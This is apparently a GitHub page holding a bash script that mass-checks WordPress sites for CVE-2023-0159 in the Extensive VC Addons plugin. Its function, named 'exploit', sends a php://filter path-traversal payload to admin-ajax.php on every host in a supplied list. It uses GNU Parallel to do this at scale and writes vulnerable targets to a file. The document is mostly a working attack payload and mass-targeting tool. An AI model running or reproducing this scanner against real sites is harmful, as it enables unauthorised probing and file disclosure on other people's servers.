-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathevcer.sh
43 lines (36 loc) · 1.27 KB
/
evcer.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/bin/bash
# CVE-2023-0159 - Extensive VC Addons for WPBakery page builder | Vulnerability Checker
# Created By Im-Hanzou
# Using GNU Parallel
# Usage: bash evcer.sh list.txt thread
yellow='\033[0;33m'
cat << "EOF"
_______ _ _ _______ _______ ______
|______ \ / | |______ |_____/
|______ \/ |_____ |______ | \_
EOF
printf "CVE-2023-0159 Mass Vulnerability Checker\n\n"
printf "${yellow}Created By Im-Hanzou
Github : im-hanzou\n\n"
touch vuln.txt notvuln.txt
exploit(){
classic='\033[0m'
red='\e[41m'
green='\e[42m'
target=$1
thread=$2
if [[ $(curl -s -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../index.php' --connect-timeout 10 --max-time 10 --insecure $target'/wp-admin/admin-ajax.php') =~ 'Items are loaded' ]];
then
printf "${green}[ Vuln ]${classic} => [$target] \n";
echo "$target" >> vuln.txt
else
printf "${red}[ Not Vuln ]${classic} => $target \n";
echo "$target" >> notvuln.txt
fi
}
export -f exploit
parallel -j $2 exploit :::: $1
total=$(cat vuln.txt | wc -l)
totalb=$(cat notvuln.txt | wc -l)
printf "\033[0;36mTotal Vuln : $total\n";
printf "\033[0;36mTotal Not Vuln : $totalb\n";